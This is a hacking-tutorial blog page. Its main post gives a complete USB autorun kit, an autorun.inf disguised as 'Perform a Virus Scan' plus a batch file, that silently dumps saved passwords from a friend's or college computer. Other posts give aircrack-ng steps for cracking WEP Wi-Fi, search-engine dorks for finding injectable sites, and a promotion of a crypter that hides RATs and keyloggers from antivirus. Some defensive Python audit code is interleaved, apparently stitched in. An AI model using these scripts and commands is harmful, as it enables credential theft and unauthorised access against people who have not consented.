Showing posts with label Hacking Tuturials. Show all posts

Wednesday, 22 January 2014

How to hack password using usb

Today I will show you how to hack passwords using a USB pen drive. As we all know, Windows stores most of the passwords that are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows Messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP and FTP accounts, and the auto-complete passwords of many browsers like IE and Firefox. There exist many tools for recovering these passwords from their stored places. Using these tools and a USB pendrive you can create your own rootkit to hack passwords from your friend’s/college computer.

We need the following tools to create our rootkit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE PassView: IE PassView is a small utility that reveals the passwords stored by the Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet Explorer, v4.0 - v6.0.

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of password-protected sites, MSN Explorer passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by the Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to view the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step-by-step procedure to create the password hacking toolkit:

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables (.exe files) onto your USB pendrive, i.e. copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe onto your USB drive.

2. Create a new Notepad and write the following text into it:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

Save the Notepad and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text into it:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive as well.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps:

1. Insert the pendrive and the autorun window will pop up. (This is because we have created an autorun pendrive.)

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (this process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP, Vista and 7.

NOTE: This procedure will only recover the stored passwords (if any) on the computer.
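From the defender's side, the two files above are easy to recognise on a removable drive. The following check is an added example, not part of the original post: it parses autorun.inf, follows the launch target, and flags batch lines that run the listed tools with /stext. The function names and the sample dictionary are constructed for illustration.

```python
from pathlib import Path

# Executable names taken from the launch.bat in the post.
RECOVERY_TOOLS = {"mspass.exe", "mailpv.exe", "iepv.exe", "pspv.exe", "passwordfox.exe"}
LAUNCH_KEYS = {"open", "shellexecute"}  # autorun.inf keys that start a program


def parse_autorun(text):
    """Return {key: value} from the [autorun] section (keys lower-cased)."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
        elif in_section and "=" in line and not line.startswith(";"):
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def audit_files(files):
    """files maps file name -> text content for the root of a removable drive."""
    by_name = {name.lower(): body for name, body in files.items()}
    autorun = parse_autorun(by_name.get("autorun.inf", ""))
    findings, targets = [], set()
    for key in sorted(autorun.keys() & LAUNCH_KEYS):
        parts = autorun[key].split()
        if parts:
            targets.add(parts[0].strip('"').lower())
            findings.append(f"autorun.inf {key}= launches {parts[0]}")
    if targets and autorun.get("action"):
        findings.append(f"AutoPlay prompt is labelled {autorun['action']!r}")
    for name, body in sorted(by_name.items()):
        if not name.endswith((".bat", ".cmd")):
            continue
        for line in body.splitlines():
            tokens = [t.strip('"').lower() for t in line.split()]
            tools = RECOVERY_TOOLS & {Path(t.replace("\\", "/")).name for t in tokens}
            if tools and "/stext" in tokens:
                tag = " (autorun target)" if name in targets else ""
                findings.append(f"{name}{tag}: {sorted(tools)[0]} dumps to text via /stext")
    return findings


def audit_drive(root):
    """Read autorun.inf and batch files from a mounted drive's root directory."""
    files = {}
    for path in Path(root).iterdir():
        if path.is_file() and path.suffix.lower() in {".inf", ".bat", ".cmd"}:
            files[path.name] = path.read_text(errors="replace")
    return audit_files(files)


# Constructed sample: the two files as the post describes them (shortened).
SAMPLE = {
    "autorun.inf": "[autorun]\nopen=launch.bat\nACTION= Perform a Virus Scan\n",
    "launch.bat": "start mspass.exe /stext mspass.txt\nstart iepv.exe /stext iepv.txt\n",
}

if __name__ == "__main__":
    for finding in audit_files(SAMPLE):
        print(finding)
```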

Folder lock without any software

Folder Lock With Password Without Any Software

Paste the code given below into Notepad and save it as a batch file (with the extension '.bat'). Any name will do. Double-click this batch file to create the folder locker: a new folder named 'Locker' is created at the same location. Move all the files you want to hide into the 'Locker' folder, then double-click the batch file again to lock it. To unlock your files, double-click the batch file once more and you will be prompted for the password. Enter the password and enjoy access to the folder. Note that the script only renames and hides the folder: the files are not encrypted, and the password is stored in plain text inside the batch file.

rem If the disguised folder exists it is currently locked, so ask for the password
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
rem Rename the folder to a Control Panel shell name and mark it hidden + system
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
rem Replace the text between the quotes with your own password
if NOT "%pass%"=="type your password here" goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

How to hack into a computer on lan

Tuesday, 21 January 2014

How to hack administrator account with guest account

How to access blocked websites in Pak humanity / 34 days ago

India became acquainted, though maybe not willingly, with Ashok Kumar or India’s John Doe a few months before. The unimaginative name, suitably so, has taken on painful significance for Internet users. It’s on the back of an Ashok Kumar court order that Internet service providers (ISPs) have blocked torrent sites.

But also affected were legitimate video sharing sites such as Dailymotion and Vimeo. These are frequently used by creative professionals to share their commercial content.

Now, while we do not condone the use of torrent and video-sharing sites to share copyrighted content, there’s a fair case to be made that it isn’t the medium that should be punished. It is the very same medium that lets you download tonnes of copyright-free content fast and easy. So, for those who have been inconvenienced by over-zealous ISPs, here are a few tips to access such blocked content.

For example, say we want to get access to zedge.net or adf.ly shortened URLs:

Step 1 : Open the URL http://unblocksit.es

Step 2 : Provide the input of the URL you want to access and hit Go.

And it was as simple as that: you get access to any website that is blocked anywhere. This tip will work all over the world and not only in India.

You can use this to access Facebook, Twitter or any other sites which are blocked by your ISP or the local network administrator.

Hope you enjoyed the trick.

How to hack wifi wep with Backtrack 5 . Pak humanity / nahdiaameen / 84 days ago


Download BackTrack. It is a Linux operating system. You can find it simply by searching on Google, and you can make it bootable from USB by following an Ubuntu video on YouTube. Then it is ready to use.

TERMINAL COMMANDS:
startx

GO TO TASKBAR AND CLICK ON THE COMMAND CONSOLE ICON:
/etc/init.d/networking start
airmon-ng

CHECK THE NAME OF THE WIRELESS CARD:

airmon-ng stop [wireless card name]
airmon-ng start [wireless card name]
airmon-ng (to see the changes)
airodump-ng [wireless card name]
ctrl c
airodump-ng -w wep -c [channel number] --bssid [Bssid number] [wireless card name]

OPEN UP NEW CONSOLE:
aireplay-ng -1 0 -a [bssid] [wireless card name]

OPEN UP NEW CONSOLE:
aireplay-ng -3 -b [bssid] [wireless card name]

BRING UP 1ST CONSOLE:(run until data +30,000)

BRING UP CONSOLE SENDING/RECEIVING DATA:
ctrl c
dir

LOOK FOR FILE ENDING IN .cap
aircrack-ng [filename]

THIS WILL GIVE THE WIRELESS KEY!

India’s own Spying PRISM “Netra” coming soon


Think twice before using words like ‘Bomb’, ‘Attack’, ‘Blast’ or ‘kill’ in your Facebook status updates, tweets or emails, because this may flag you as a potential terrorist under a surveillance project of Indian security agencies. This Indian Internet surveillance project, named NETRA (Network Traffic Analysis), is capable of detecting and capturing any dubious voice traffic passing through software such as Skype or Google Talk, according to the Economic Times. In Hindi, NETRA means “eye”, and this project is an Indian version of PRISM, i.e. a spying project by the US National Security Agency (NSA) that also allows the government to monitor the Internet and telephone records of citizens.

Reportedly, NETRA is under testing right now by the Indian Intelligence Bureau and Cabinet Secretariat and, on success, will be deployed by all Indian national security agencies. The Centre for Artificial Intelligence and Robotics (CAIR), a lab under the Defence Research and Development Organisation (DRDO), is still hard at work on the ‘Netra’ project to give it extraordinary features like NSA’s PRISM. One fun fact about the project is that NETRA is defined to use only 300 GB of storage space for storing the intercepted internet traffic… Are they serious? How is it possible? This data will be shared with a maximum of three security agencies, including the Intelligence Bureau (IB) and Cabinet Secretariat. At this time, even I am not sure what they mean by “300 GB of storage space”, but we are trying to contact the DRDO guys for further information on this matter.

Anyway, NSA has a 100,000 square foot “mission critical data center”, where they are intercepting 1.7 billion American electronic records and communications a day, using 5 Zettabytes (1 Trillion GB) of space to keep all information stored for the next 500 years at least.

Also some questions arise here that:

Do they have the capability to handle and analyze such huge amount of data? (If it is not 300GB only)
Other than terrorist attacks, will they also deal with Computer Security Incidents and vulnerabilities?
What does that 300 GB of storage space mean?
The government should clear the objectives and ability of the NETRA project. Because according to the population of Internet users in India, words like ‘Bomb’, ‘Attack’, ‘Blast’ or ‘kill’ will trigger RED ALARM millions of times a day and if they don’t have the capability to trace down right mischief people, rather than disturbing elements, which may purposefully divert the attention of security agencies for various means.

Another major concern is Privacy, unwarranted digital intrusions and interference with citizens’ online communications.

Forbes India reported that, India has more than around 50 different laws, rules and regulations that aim to uphold privacy and confidentiality in various domains. Unfortunately, most of those policies are very dated and do not sufficiently take into account the challenges of contemporary information societies.

Do they believe that secrecy, confidentiality and, most importantly, privacy must be sacrificed for national security? Bruce Schneier, security technologist, said before, “There is no security without privacy. And liberty requires both security and privacy.”

Social hacking

Search Engine Hacking

Search engines, by definition, are used to find and locate information on the World Wide Web. In addition to using search engines to search for information, attackers have ways of using search engines to identify and locate vulnerabilities and confidential data.

Using search engines to find vulnerabilities offers a way for attackers to probe a network without the target’s knowledge since the entire search request and response come from the search engine and not the target. The attacker doesn’t leave a footprint since he is not sending information to the target. Attackers also use a cached page to view the information, instead of accessing the site directly, which creates another layer of protection for them.

Google Hacking

Numerous books and presentations discuss how to gather “sensitive” information from Google. Attackers can use Google to gather basic information such as contact lists, internal documents, and top-level organizational structures, as well as locate potential vulnerabilities in an organization’s web application.

Attackers can use a specific type of search query, called a dork, to locate security issues or confidential data. Attackers can use dorks to obtain firewall logs and customer data, and to find ways to access an organization’s database.

Security professionals have developed public databases of dorks. Dork databases exist for several different search engines; the most common dork database is the Google Hacking Database.

Note

The Google Hacking Database (GHDB) is a great resource for finding dorks that can aid an attacker. The GHDB is located at http://johnny.ihackstuff.com/ghdb/.

Using a dork is relatively simple. An attacker locates a dork of interest, and then uses Google to search for the dork. The following code is a dork that attempts to identify web applications that are susceptible to an SQL injection vulnerability by searching for a MySQL error message that commonly signifies the existence of an SQL injection flaw:

"Unable to jump to row" "on MySQL result index" "on line"

An attacker can limit the dork to a certain domain by adding the site: directive to the query string. For example, here is a Google query that is limited to the example.com domain:

"Unable to jump to row" "on MySQL result index" "on line" site:example.com

Figure 1-4 illustrates the execution of the SQL injection dork. Notice that more than 900,000 results were returned!

Figure 1-4. Execution of an SQL injection dork

Automating Google Hacking

An attacker can use the Search Engine Assessment Tool (SEAT), developed by Midnight Research Labs, to automate Google hacking. SEAT uses search engines and search caches to search for vulnerabilities for a particular domain.

SEAT supports multiple search engines, including Google, Yahoo!, and MSN. SEAT also has a variety of built-in dorks. The databases that SEAT uses (shown in Figure 1-5) were compiled from multiple sources, including the GHDB and Nikto.

An attacker can select multiple databases and search engines when using SEAT. Along with SEAT’s multithreading, these features aid the attacker greatly when he’s gathering information via search engine hacking. Figure 1-6 shows SEAT during the execution stage running 15 simultaneous queries.

Note

You can obtain the latest version of SEAT from http://midnightresearch.com/projects/search-engine-assessment-tool/.

Extracting Metadata from Online Documents

Metadata is “data about other data.” A good example of metadata is the data that is often inserted into Microsoft Office documents such as Word. For instance, Microsoft Word inserts data such as usernames and folder paths of the author’s machine. Attackers can extract this metadata from documents that corporations have put online.

Using search engines, attackers can use specific directives to limit their results to specific file types that are known to include metadata. For example, the Google directive filetype:doc will return only Microsoft Word files. The following is a query that returns only PowerPoint presentations that contain the phrase “Q4 Expenses”:

filetype:ppt "Q4 Expenses"

Figure 1-5. SEAT’s different built-in vulnerability databases

Attackers query Google using such queries; then they download the documents that are returned and examine them, pulling out any metadata stored within them.

Metagoofil is an automated tool that queries Google to find documents that are known to contain metadata. Metagoofil will query Google using a specific domain, download the files that are returned, and then attempt to extract the contents. Here is a demonstration of Metagoofil being used against example.com:

$ python metagoofil.py -d example.com -f all -l 3 -o example.html -t DL
*************************************
*MetaGooFil Ver. 1.4a               *
*Coded by Christian Martorella      *
*Edge-Security Research             *
*cmartorella@edge-security.com      *
*************************************

[+] Command extract found, proceeding with leeching
[+] Searching in example.com for: pdf
[+] Total results in google: 5300
[+] Limit: 3
        [ 1/3 ] http://www.example.com/english/lic/gl_app1.pdf
        [ 2/3 ] http://www.example.com/english/lic/gl_app2.pdf
        [ 3/3 ] http://www.example.com/english/lic/gl_app3.pdf
[+] Searching in example.com for: doc
[+] Total results in google: 1500
[+] Limit: 3
        [ 1/3 ] http://www.example.com/english/lic/gl_app1.doc
        [ 2/3 ] http://www.example.com/english/lic/gl_app2.doc
        [ 3/3 ] http://www.example.com/english/lic/gl_app3.doc
[+] Searching in example.com for: xls
[+] Total results in google: 20
[+] Limit: 3
        [ 1/3 ] http://www.example.com/english/lic/gl_app1.xls
        [ 2/3 ] http://www.example.com/english/lic/gl_app2.xls
        [ 3/3 ] http://www.example.com/english/lic/gl_app3.xls
[+] Searching in example.com for: ppt
[+] Total results in google: 60
[+] Limit: 3
        [ 1/3 ] http://www.example.com/english/lic/gl_app1.ppt
        [ 2/3 ] http://www.example.com/english/lic/gl_app1.ppt
        [ 3/3 ] http://www.example.com/english/lic/gl_app1.ppt
[+] Searching in example.com for: sdw
[+] Total results in google: 0
[+] Searching in example.com for: mdb
[+] Total results in google: 0
[+] Searching in example.com for: sdc
[+] Total results in google: 0
[+] Searching in example.com for: odp
[+] Total results in google: 0
[+] Searching in example.com for: ods
[+] Total results in google: 0

Usernames found:
================
rmiyazaki
tyamanda
hlee
akarnik
April Jacobs
Rwood
Amatsuda
Dmaha
Dock, Matt

Paths found:
============
C:\WINNT\Profiles\Dmaha\
C:\TEMP\Dmaha\
C:\Program Files\Microsoft Office\Templates|Presentation Designs\example
C:\WINNT\Profiles\Rwood
[+] Process finished

Figure 1-6. SEAT using 15 threads, searching for vulnerabilities using multiple search engines

Note

The publicly available Python script metagoofil.py aids in searching, gathering, and extracting metadata from documents. It is available from http://www.edge-security.com/metagoofil.php.
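A publisher-side check for the leak described above, as an added example (not from the original text and not Metagoofil's code): it reports the author fields and Windows paths inside an OOXML file (.docx/.pptx/.xlsx) and blanks the author fields before the file goes online. It covers OOXML packages rather than the legacy .doc/.ppt files in the output above; the function names and the sample package are constructed for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)  # keep readable prefixes when re-serialising
PERSON_FIELDS = {"creator": "dc:creator", "lastModifiedBy": "cp:lastModifiedBy"}
PATH_RE = re.compile(rb"[A-Za-z]:\\(?:[^\\/:*?\"<>|\r\n]+\\)+")  # drive + directories


def read_metadata(data):
    """Return author fields and any Windows paths found in an OOXML package."""
    found = {"creator": "", "lastModifiedBy": "", "paths": set()}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            body = pkg.read(name)
            found["paths"].update(m.decode("utf-8", "replace") for m in PATH_RE.findall(body))
            if name == "docProps/core.xml":
                root = ET.fromstring(body)
                for field, tag in PERSON_FIELDS.items():
                    found[field] = root.findtext(tag, default="", namespaces=NS)
    found["paths"] = sorted(found["paths"])
    return found


def scrub(data):
    """Return a copy with the person fields in core.xml blanked (paths are only reported)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            body = src.read(name)
            if name == "docProps/core.xml":
                root = ET.fromstring(body)
                for tag in PERSON_FIELDS.values():
                    for node in root.findall(tag, NS):
                        node.text = ""
                body = ET.tostring(root, encoding="utf-8", xml_declaration=True)
            dst.writestr(name, body)
    return out.getvalue()


def build_sample():
    """Constructed minimal package (not a complete document) with leaky metadata."""
    core = (
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        "<dc:creator>Dmaha</dc:creator><cp:lastModifiedBy>Rwood</cp:lastModifiedBy>"
        "</cp:coreProperties>" % (NS["cp"], NS["dc"])
    )
    doc = r"<doc><t>Template: C:\WINNT\Profiles\Dmaha\plan.dot</t></doc>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("docProps/core.xml", core)
        pkg.writestr("word/document.xml", doc)
    return buf.getvalue()


if __name__ == "__main__":
    print(read_metadata(build_sample()), read_metadata(scrub(build_sample())), sep="\n")
```

A path reported from the document body has to be removed in the authoring tool; scrub() deliberately leaves document content untouched.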

Searching for Source Code

Developers will often post code on public forums when they discover a bug they cannot solve. Too often, these developers will post code without redacting it in any way. It is unsettling how often these forums display code that clearly belongs to a specific organization.

Information such as the developer’s name, internal comments, code descriptions, and organizational ownership are among the items you can find in source code that is posted on public forums on the Internet.

Using Google, it is trivial to find some of this code in a short period of time. Using search terms such as “here is the code” and “here is the exact code” will return many results. Here is a code snippet that we found using Google (the code has been redacted):

<?php
$error = ""; // Set a variable that will be used for errors
$sendTo = ""; // Set a variable that will be used for emailing
// Form is submitted
if(isset($_POST['upload']) && $_POST['upload'] == 'Upload File')
{
    $whereto = $_POST['where']; // Gets post value from select menu
    // Gets file value from file upload input
    $whatfile = $_FILES['uploadedfile']['name'];
    // This is the subject that will appear in the email
    $subject = "File uploaded to ". $whereto ." directory";
    $from = "FTP UPLOAD <noreply@redacted.com>";
    // Checks to see if $whereto is empty, if so echo error
    if(empty($whereto))
    {
        $error = "You need to choose a directory.<br />";
    }
    // Checks to see if file input field is empty, if so throw an error
    if($whatfile == NULL) {
        $error .= "You need to choose a file.";
    }
    //if no errors so far then continue uploading

    if(!empty($whereto) && $whatfile != NULL) {
        $target_path = "$whereto/"; // The directory the file will be placed
...

This code snippet describes upload functionality that is on a web server. An attacker can use this code to reverse-engineer how to get a file into a different directory, or how to bypass the security mechanisms that are in place.

Monday, 20 January 2014

Aegis Crypter 2.4 Full Version

Aegis Crypter can be used to encrypt viruses, RATs, keyloggers, spyware etc. to make them undetectable by antiviruses. When these exe files are encrypted with FUD crypters they become undetectable by antiviruses.

For further information on Aegis Crypter 2.4 and its installation, visit: http://www.aegiscrypter.com/

Sunday, 19 January 2014

We will guide you about hacking for the first time in the history of Pakistan; hope you will like this.